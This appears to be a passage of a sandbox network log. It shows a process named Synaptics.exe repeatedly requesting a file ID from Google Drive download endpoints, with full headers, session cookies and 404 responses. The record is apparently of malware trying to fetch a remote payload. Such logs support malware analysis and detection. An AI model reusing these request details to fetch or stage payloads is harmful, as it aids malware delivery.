2024-12-30 10:25:36 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:36 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7Y7DTRfb37wmeygo-osyZHOQC6LdETDiKai0i-MnQRYumN4Y7ly3Rr01zS_bbNp35u
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-2Ma45EpewXIetwEGGQiNbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:36 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:36 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="08Fx3wY7uGMyfJFGmP204g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:36 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.9 | 49785 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:37 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2024-12-30 10:25:37 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:37 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-PhztMQkavv3hK-odUuj3NA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.9 | 49784 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:37 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2024-12-30 10:25:37 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:37 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-dx-hmcoJCplZQjFqc_iW9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.9 | 49787 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:38 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2024-12-30 10:25:38 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:38 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-NXkpvRQmjq03ed_1RSuJ9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.9 | 49788 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:38 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:39 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7DXWhOdjjGpH5Ee5m4wo3Ijp5Eb1wwTt2GJn2YbdCEDhw_h4yCTeVz8ZpDipIccCqI
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:38 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-kbXeYQMNDWpQuSBDYTZssA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:39 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:39 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="u6xWxbACktDM7-YmebxYvQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:39 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    43 | 192.168.2.9 | 49790 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:38 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:38 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-WIbGBfD9Q_xY11B4eKx-Hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    44 | 192.168.2.9 | 49789 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:39 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:39 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7DCxlNerWapFpc1sWBylio5fQTsLIyRTppP6zJDM6KOmmDhFN1fD74vrK87aKJ2ku1J60Q79M
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:39 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Na5BI9FdRkLEuNQ1IaNykw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:39 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:39 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="EOwLhu8Qo8Uns0c6_x7lkQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:39 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    45 | 192.168.2.9 | 49792 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:39 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC
                                                                                                                    2024-12-30 10:25:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:39 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DviTcj50V84dJr9BaUBAPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    46 | 192.168.2.9 | 49793 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:39 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:40 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5D8s9HxmvRkEX0pER7nT_KDVZ40S1TIcqBlNV8dh3kWmnCCoFV5Krjhsd0YLqZY7p2DTaQ6GA
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:39 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-yoGInZjpuifgIy7IDqluTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:40 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:40 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="CByQaAIfrXI9_xuL2GWUlg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:40 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    47 | 192.168.2.9 | 49796 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:39 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC
                                                                                                                    2024-12-30 10:25:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:39 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ScDfgB-MVcBtld_CLgJxjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    48 | 192.168.2.9 | 49797 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:40 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:40 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7HLcXAnLhbSjbjNmiLiZhqJCAW3apfWCgKID1LuO7mF3_MvUaK-Kv2rckeaxxHGTNz
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
